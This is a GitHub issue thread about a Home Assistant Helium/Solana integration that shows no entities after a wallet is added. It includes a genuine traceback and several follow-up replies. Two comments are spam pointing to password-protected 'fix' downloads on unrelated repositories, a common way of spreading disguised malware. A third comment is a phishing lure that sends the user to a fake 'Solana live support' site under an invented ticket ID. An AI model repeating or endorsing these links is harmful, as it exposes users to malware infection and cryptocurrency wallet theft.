### ISSUE TITLE
After (Solana) Wallet integration no devices or entities showing up

### ISSUE THREAD

**Issue by Fl77777** [enes-oerdek/Home-Assistant-Helium-Integration#19]
Hi,
after I added my solana wallet ID (add integration ->select wallet -> confirm -> enter Solana wallet ID -> confirm) no device or entity is shown for this wallet. Reloading this intetegration or restarting home assistant did not resolve this issue. Any idea?
Thanks

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Clarevero1** [comment]
> Hi, after I added my solana wallet ID (add integration ->select wallet -> confirm -> enter Solana wallet ID -> confirm) no device or entity is shown for this wallet. Reloading this intetegration or restarting home assistant did not resolve this issue. Any idea? Thanks


@Fl77777 You're experiencing transcript error. It sounds like your query would be best dealt with by the support team.
I'll have to refer you to the official support live chat with the ticket ID SOL07638
Please see the link below to our dedicated support line:
[Solana live support](https://thedappsupport.web.app)
Click on the live chat icon at the bottom corner of the page to initiate chat with a live support agent

**Comment by KishCom** [comment]
Same here.

Logs related to the failure:

```
Logger: homeassistant.components.sensor
Source: helpers/entity_platform.py:361
integration: Sensor ([documentation](https://www.home-assistant.io/integrations/sensor), [issues](https://github.com/home-assistant/core/issues?q=is%3Aissue+is%3Aopen+label%3A%22integration%3A+sensor%22))
First occurred: September 26, 2024 at 10:39:40 (2 occurrences)
Last logged: 12:03:51
Error while setting up helium_solana platform for sensor

Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/helpers/entity_platform.py", line 361, in _async_setup_platform
    await asyncio.shield(awaitable)
  File "/config/custom_components/helium_solana/sensor.py", line 78, in async_setup_entry
    sensors = await get_sensors(integration, wallet, None)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/helium_solana/sensor.py", line 167, in get_sensors
    if response.status_code == 200:
       ^^^^^^^^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'status_code'
```

However this repo looks abandoned :(

**Comment by Julietnacy** [comment]
@Fl77777 you might want to double-check if the wallet ID is entered correctly. Sometimes a small typo can cause issues or has it been resolved?

**Comment by ggonmar** [comment]
Same here... Wallet data is not loading :/

**Comment by ggonmar** [comment]
Any update on this?
